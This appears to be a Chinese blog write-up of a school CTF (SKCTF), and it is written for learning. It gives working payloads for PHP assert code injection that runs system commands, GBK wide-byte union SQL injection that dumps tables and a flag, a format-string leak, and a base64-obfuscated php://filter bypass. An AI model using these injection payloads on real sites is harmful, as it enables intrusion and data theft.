<!DOCTYPE html>












  


<html class="theme-next gemini use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">


















  
  
  <link rel="stylesheet" href="/lib/fancybox/source/jquery.fancybox.css">







<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2">

<link rel="stylesheet" href="/css/main.css?v=7.1.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=7.1.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/Fire32.png?v=7.1.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/Fire16.png?v=7.1.0">


  <link rel="mask-icon" href="/images/logo.svg?v=7.1.0" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '7.1.0',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false,"dimmer":false},
    back2top: true,
    back2top_sidebar: false,
    fancybox: true,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="快乐校赛">
<meta name="keywords" content="ctf">
<meta property="og:type" content="article">
<meta property="og:title" content="SKCTF-5-25wp">
<meta property="og:url" content="http://n4tsu.top/2019/06/04/SKCTF-5-25wp/index.html">
<meta property="og:site_name" content="Natsu">
<meta property="og:description" content="快乐校赛">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190604224316.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190604224346.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190604224426.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190604224507.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190604225147.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190604225320.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190604225419.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190605205603.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190605205634.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190605205728.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190605205914.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190605210132.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190605210239.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190605210654.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190605210937.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190605211114.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190605211355.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190605212235.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190611211513.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190616190827.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190607174115.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190607175039.png">
<meta property="og:updated_time" content="2019-06-16T11:09:20.944Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SKCTF-5-25wp">
<meta name="twitter:description" content="快乐校赛">
<meta name="twitter:image" content="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190604224316.png">





  
  
  <link rel="canonical" href="http://n4tsu.top/2019/06/04/SKCTF-5-25wp/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>SKCTF-5-25wp | Natsu</title>
  












  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Natsu</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-aboutme">

    
    
    
      
    

    

    <a href="/AboutMe" rel="section"><i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br>关于</a>

  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>搜索</a>
        </li>
      
    </ul>
  

  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://n4tsu.top/2019/06/04/SKCTF-5-25wp/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="shiki">
      <meta itemprop="description" content="trying to understand">
      <meta itemprop="image" content="/images/head.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Natsu">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SKCTF-5-25wp

              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2019-06-04 21:45:37" itemprop="dateCreated datePublished" datetime="2019-06-04T21:45:37+08:00">2019-06-04</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">更新于</span>
                
                <time title="修改时间：2019-06-16 19:09:20" itemprop="dateModified" datetime="2019-06-16T19:09:20+08:00">2019-06-16</time>
              
            
          </span>

          

          
            
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>快乐校赛</p>
<a id="more"></a>
<h1 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h1><h3 id="一个不能按的按钮"><a href="#一个不能按的按钮" class="headerlink" title="一个不能按的按钮"></a>一个不能按的按钮</h3><p>题目复现地址：<a href="http://47.103.6.99:8000" target="_blank" rel="noopener">http://47.103.6.99:8000</a></p>
<p><img src="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190604224316.png" alt></p>
<p>打开题目，点击flag。</p>
<p><img src="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190604224346.png" alt></p>
<p>确实是不能按的。。</p>
<p>想到应该是改js。</p>
<p><img src="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190604224426.png" alt></p>
<p>去掉此处的disabled，即可点击。</p>
<p>给出源码：</p>
<p><img src="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190604224507.png" alt></p>
<p>解题思路应是利用assert断言函数和page这一可控变量。</p>
<p>assert函数当变量为真值时将字符串当作语句执行，而当false值时将其转换成一空字符串。</p>
<p>注意，构造payload时不可闭合assert函数，因为脱离这一函数的语句都会被自动转义，故应闭合file_exists函数来进行任意语句执行。</p>
<p>另外，最后进行注释的时候应该注意不可使用#。因为#在url中是起一个锚(或者说书签的作用，可自行百度)的作用。此处参考sql注入时使用#的url编码%23，或者php的另外一种单行注释方法//均可。</p>
<p>综上，构造payload：</p>
<pre><code>http://47.103.6.99:8000/flag.php?file=flag%27)%20or%20system(%27ls%27);//
</code></pre><p>得到</p>
<p><img src="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190604225147.png" alt></p>
<p>这里我几乎翻遍了所有目录(../../)也没想到ls -a来查看隐藏文件orz</p>
<pre><code>http://47.103.6.99:8000/flag.php?file=flag%27)%20or%20system(%27ls%20-a%27);//
</code></pre><p>可以看到<br><img src="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190604225320.png" alt></p>
<p>一个明显存放flag的文件。</p>
<p>cat之。</p>
<pre><code>http://47.103.6.99:8000/flag.php?file=flag%27)%20or%20system(%27cat%20.ffll44gg%27);//
</code></pre><p>拿到flag。</p>
<p><img src="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190604225419.png" alt></p>
<h4 id="附"><a href="#附" class="headerlink" title="附"></a>附</h4><p><a href="https://www.cnblogs.com/julin-peng/p/4237791.html" target="_blank" rel="noopener">URL中“#” “？” &amp;“”号的作用</a></p>
<p><a href="http://www.vuln.cn/8395" target="_blank" rel="noopener">浅析一句话后门中eval与assert执行条件与原理</a></p>
<p><a href="https://yq.aliyun.com/articles/27402" target="_blank" rel="noopener">php中assert方法的安全问题</a></p>
<p><a href="https://www.php.net/manual/zh/function.assert.php" target="_blank" rel="noopener">PHP assert() Manual (官方文档)</a></p>
<h3 id="学生信息查询"><a href="#学生信息查询" class="headerlink" title="学生信息查询"></a>学生信息查询</h3><p><a href="http://47.103.6.99:8003/" target="_blank" rel="noopener">题目复现地址</a></p>
<p><img src="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190605205603.png" alt></p>
<p>?id=1查询，得到</p>
<p><img src="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190605205634.png" alt></p>
<p>?id=1’查询，得到</p>
<p><img src="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190605205728.png" alt></p>
<p>可以看到单引号被转义掉了。</p>
<p>想到宽字节注入，试一下：</p>
<pre><code>?id=1%df%27
</code></pre><p><img src="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190605205914.png" alt><br>报错了，说明猜想正确，开始进行注入。</p>
<pre><code>?id=1%df%27%20order%20by%201%20%23
</code></pre><p>正常回显。</p>
<p>直到</p>
<pre><code>?id=1%df%27%20order%20by%204%20%23
</code></pre><p>报错：<br><img src="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190605210132.png" alt></p>
<p>说明有三个字段。接着爆库</p>
<pre><code>?id=-1%df%27%20union%20select%201,2,database()%20%23
</code></pre><p>P.S  这里查询的id=-1是因为-1代表不存在的数据，不会有任何回显，这样就可以看到后面联合查询出来的内容。<br>得<br><img src="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190605210239.png" alt></p>
<p>然后爆表</p>
<pre><code>?id=-1%df%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%20=%20database()%20%23
</code></pre><p>这里库名用database()的原因是过滤了单引号，可以用该函数或者转换为16进制来进行绕过。</p>
<p>得到<br><img src="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190605210654.png" alt></p>
<p>然后爆字段</p>
<pre><code>?id=-1%df%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name%20=%200x666c6167%20--+
</code></pre><p>这里的0x666c6167即为flag的16进制。</p>
<p>得到<br><img src="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190605210937.png" alt><br>只有一个叫做flag的字段。所以直接查询：</p>
<pre><code>?id=-1%df%27%20union%20select%201,2,flag%20from%20flag%20--+
</code></pre><p>得到flag。<br><img src="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190605211114.png" alt></p>
<h4 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h4><ul>
<li>gbk编码的宽字节注入</li>
<li>查询参数值-1</li>
<li>过滤单引号使用16进制绕过</li>
</ul>
<h3 id="I-am-looking-at-you"><a href="#I-am-looking-at-you" class="headerlink" title="I am looking at you"></a>I am looking at you</h3><p><a href="http://47.103.6.99:8006/" target="_blank" rel="noopener">题目复现地址</a></p>
<p>一道代码审计题目。</p>
<p><img src="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190605211355.png" alt></p>
<p>看完代码之后，可以看到关键点在于sprintf函数。那么它的作用是什么呢？</p>
<p>类似于c语言里的sprintf，把百分号（%）符号替换成一个作为参数进行传递的变量。如题目中的用法：</p>
<pre><code>sprintf($data,$_v);
</code></pre><p>data变量的初始值为“I am looking at you %s”，其中的%s在sprintf函数中作为占位符传入后面的$_v函数的值。</p>
<p>脱离出welcome函数，$arr变量是$_GET[‘myname’]和$flag组成的一个数组。显然flag变量的值就是我们需要的flag。之后调用welcome函数对arr变量进行操作，而welcome函数中会对该数组遍历，执行</p>
<pre><code>$data = sprintf($data,$_v); 
</code></pre><p>这一操作。</p>
<p>想到可以在我们能够控制的变量myname中放入一个%s，这样经过第一次便利后data变量还是有一个%s，再经历一次sprintf函数就会将在后面的flag变量的值输出出来。所以构造payload：</p>
<pre><code>?myname=cxk%s
</code></pre><p>得到flag：<br><img src="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190605212235.png" alt></p>
<h3 id="task"><a href="#task" class="headerlink" title="task"></a>task</h3><p>题目源码：<br><img src="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190611211513.png" alt></p>
<p>进行审计。首先，is_ok函数会对传入的参数进行正则表达式匹配，若传入的参数为两个数字或字母，则会退出函数。</p>
<p>之后检测p变量，若p不为字母或数字，则pp变量为解码后的p变量，然后包含一个pp变量。</p>
<p>通过dalao指点得知在base64编码范围之外的字符可以绕过正则表达式。</p>
<p>所以结合php://伪协议令p=php://filter/read=convert.base64-encode/resource=flag.php</p>
<p>将该payload进行base64编码后在每一个字符前加一个在base64编码范围之外的单引号，就可以成功绕过。</p>
<p>所以构造payload：</p>
<pre><code>p=&apos;c&apos;G&apos;h&apos;w&apos;O&apos;i&apos;8&apos;v&apos;Z&apos;m&apos;l&apos;s&apos;d&apos;G&apos;V&apos;y&apos;L&apos;3&apos;J&apos;l&apos;Y&apos;W&apos;Q&apos;9&apos;Y&apos;2&apos;9&apos;u&apos;d&apos;m&apos;V&apos;y&apos;d&apos;C&apos;5&apos;i&apos;Y&apos;X&apos;N&apos;l&apos;N&apos;j&apos;Q&apos;t&apos;Z&apos;W&apos;5&apos;j&apos;b&apos;2&apos;R&apos;l&apos;L&apos;3&apos;J&apos;l&apos;c&apos;2&apos;9&apos;1&apos;c&apos;m&apos;N&apos;l&apos;P&apos;W&apos;Z&apos;s&apos;Y&apos;W&apos;c&apos;u&apos;c&apos;G&apos;h&apos;w
</code></pre><p><img src="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190616190827.png" alt></p>
<p>解密拿到的bse64即可得到flag。</p>
<pre><code>// SKCTF{18e599effd0f6da452b24421c2dde0f2}
</code></pre><h1 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h1><h3 id="二维码"><a href="#二维码" class="headerlink" title="二维码"></a>二维码</h3><p>给了一个存着RGB值的文件，使用python的PIL库来画图。</p>
<p><img src="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190607174115.png" alt><br>有78400行，整数分解一下正好是280的平方。<br>所以写脚本：</p>
<pre><code># -*- coding:utf-8 -*-
from PIL import Image
x = 280
y = 280  #  长和宽均为280
f = open(&quot;flag.txt&quot;,&apos;r&apos;) # 打开题目文件
im = Image.new(&quot;RGB&quot;,(x,y)) # 创建一个图片
for i in range(x):
    for j in range(y):
        line = f.readline().replace(&apos;(&apos;,&apos;&apos;).replace(&apos;)&apos;,&apos;&apos;)
        pixel = line.split(&apos;,&apos;)
        im.putpixel((i,j),(int(pixel[0]),int(pixel[1]),int(pixel[2]))) # 往图片的每个坐标点上填充像素
f.close()
im.show() # 展示图片
</code></pre><p>得到一个二维码：<br><img src="https://raw.githubusercontent.com/Snatsu/figurebed/master/img/20190607175039.png" alt></p>
<p>扫描得到</p>
<pre><code>ONYXE6LSIVXF6ZTUOZTXWRRRIRPWCZLWORIGCLJQG56Q====
</code></pre><p>看出为base32密码，解码得</p>
<pre><code>sqryrEn_ftvg{F1D_aevtPa-07}
</code></pre><p>栅栏解密得</p>
<pre><code>synt{DeP0qr_vF_va7rEfg1at-}
</code></pre><p>凯撒解密得flag。</p>
<pre><code>flag{QrC0de_iS_in7eRst1ng-}
</code></pre><h4 id="注"><a href="#注" class="headerlink" title="注"></a>注</h4><p>bugku上有类似题目。。</p>
<p><a href="http://n4tsu.top/2019/05/12/%E4%B8%80%E4%BA%9Bbugku%E7%9A%84%E9%A2%98%E7%9B%AEwp/#more">bugku部分wp</a></p>
<h3 id="unzip"><a href="#unzip" class="headerlink" title="unzip"></a>unzip</h3><p>这道题之前的组内赛放过一次，印象也是挺深。暂时没有题目文件，就凭印象写了。</p>
<p>又<strong>mkfile.sh中的time()</strong>得知这道题考察的是时间戳</p>
<blockquote>
<p>时间戳是指格林威治时间1970年01月01日00时00分00秒(北京时间1970年01月01日08时00分00秒)起至现在的总秒数。通俗的讲， 时间戳是一份能够表示一份数据在一个特定时间点已经存在的完整的可验证的数据。 它的提出主要是为用户提供一份电子证据， 以证明用户的某些数据的产生时间。 在实际应用上， 它可以使用在包括电子商务、 金融活动的各个方面， 尤其可以用来支撑公开密钥基础设施的 “不可否认” 服务。</p>
</blockquote>
<p>看了看一些小伙伴们的wp，发现都是暴力破解的压缩包，其实并不需要。<br>既然是考察时间戳，结合题目，<strong>把拿到的压缩包的创建时间转换为时间戳即为压缩包密码</strong>，解压即可。</p>

      
    </div>

    

    
    
    

    

    
      
    
    

    
      <div>
        




  



<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>shiki</li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    
    <a href="http://n4tsu.top/2019/06/04/SKCTF-5-25wp/" title="SKCTF-5-25wp">http://n4tsu.top/2019/06/04/SKCTF-5-25wp/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fa fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！</li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/ctf/" rel="tag"><i class="fa fa-tag"></i> ctf</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/06/04/Docker学习笔记/" rel="next" title="Docker学习笔记">
                <i class="fa fa-chevron-left"></i> Docker学习笔记
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/06/24/Xctf部分题目/" rel="prev" title="Xctf部分题目">
                Xctf部分题目 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
			<a href="/">
              <img class="site-author-image" itemprop="image" src="/images/head.png" alt="shiki">
			</a>
            
              <p class="site-author-name" itemprop="name">shiki</p>
              <div class="site-description motion-element" itemprop="description">trying to understand</div>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">11</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              

              
                
                
                <div class="site-state-item site-state-tags">
                  
                    
                    
                      
                    
                    <span class="site-state-item-count">1</span>
                    <span class="site-state-item-name">标签</span>
                  
                </div>
              
            </nav>
          

          

          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://github.com/Snatsu" title="GitHub &rarr; https://github.com/Snatsu" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
                </span>
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="mailto:764832883@qq.com" title="E-Mail &rarr; mailto:764832883@qq.com" rel="noopener" target="_blank"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                </span>
              
            </div>
          

          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                大佬们
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://hal900000.github.io" title="http://hal900000.github.io" rel="noopener" target="_blank">hal900000</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://Morton66.github.io" title="http://Morton66.github.io" rel="noopener" target="_blank">zongze666</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://LiuL14n.top" title="http://LiuL14n.top" rel="noopener" target="_blank">LiuL14n</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://qnkcdz0.xyz" title="http://qnkcdz0.xyz" rel="noopener" target="_blank">QNKCDZ0</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#WEB"><span class="nav-number">1.</span> <span class="nav-text">WEB</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#一个不能按的按钮"><span class="nav-number">1.0.1.</span> <span class="nav-text">一个不能按的按钮</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#附"><span class="nav-number">1.0.1.1.</span> <span class="nav-text">附</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#学生信息查询"><span class="nav-number">1.0.2.</span> <span class="nav-text">学生信息查询</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#总结"><span class="nav-number">1.0.2.1.</span> <span class="nav-text">总结</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#I-am-looking-at-you"><span class="nav-number">1.0.3.</span> <span class="nav-text">I am looking at you</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#task"><span class="nav-number">1.0.4.</span> <span class="nav-text">task</span></a></li></ol></li></ol><li class="nav-item nav-level-1"><a class="nav-link" href="#MISC"><span class="nav-number">2.</span> <span class="nav-text">MISC</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#二维码"><span class="nav-number">2.0.1.</span> <span class="nav-text">二维码</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#注"><span class="nav-number">2.0.1.1.</span> <span class="nav-text">注</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#unzip"><span class="nav-number">2.0.2.</span> <span class="nav-text">unzip</span></a></li></ol></li></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>
  


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">shiki</span>

  

  
</div>


  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.8.0</div>








<span id="sitetime"></span>
<script language="javascript">
  function siteTime(){
    window.setTimeout("siteTime()", 1000);
    var seconds = 1000;
    var minutes = seconds * 60;
    var hours = minutes * 60;
    var days = hours * 24;
    var years = days * 365;
    var today = new Date();
    var todayYear = today.getFullYear();
    var todayMonth = today.getMonth()+1;
    var todayDate = today.getDate();
    var todayHour = today.getHours();
    var todayMinute = today.getMinutes();
    var todaySecond = today.getSeconds();
    var t1 = Date.UTC(2018,06,07,12,00,00); // 设置建立网站的时间
    var t2 = Date.UTC(todayYear,todayMonth,todayDate,todayHour,todayMinute,todaySecond);
    var diff = t2-t1;
    var diffYears = Math.floor(diff/years);
    var diffDays = Math.floor((diff/days)-diffYears*365);
    var diffHours = Math.floor((diff-(diffYears*365+diffDays)*days)/hours);
    var diffMinutes = Math.floor((diff-(diffYears*365+diffDays)*days-diffHours*hours)/minutes);
    var diffSeconds = Math.floor((diff-(diffYears*365+diffDays)*days-diffHours*hours-diffMinutes*minutes)/seconds);
    document.getElementById("sitetime").innerHTML=" 已运行"+diffYears+" 年 "diffDays+" 天 "+diffHours+" 小时 "+diffMinutes+" 分钟 "+diffSeconds+" 秒";
  }
  siteTime();
</script>


        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>












  















  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script src="/lib/fancybox/source/jquery.fancybox.pack.js"></script>


  


  <script src="/js/utils.js?v=7.1.0"></script>

  <script src="/js/motion.js?v=7.1.0"></script>



  
  


  <script src="/js/affix.js?v=7.1.0"></script>

  <script src="/js/schemes/pisces.js?v=7.1.0"></script>




  
  <script src="/js/scrollspy.js?v=7.1.0"></script>
<script src="/js/post-details.js?v=7.1.0"></script>



  


  <script src="/js/next-boot.js?v=7.1.0"></script>


  

  

  

  


  


  
  <script>
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      

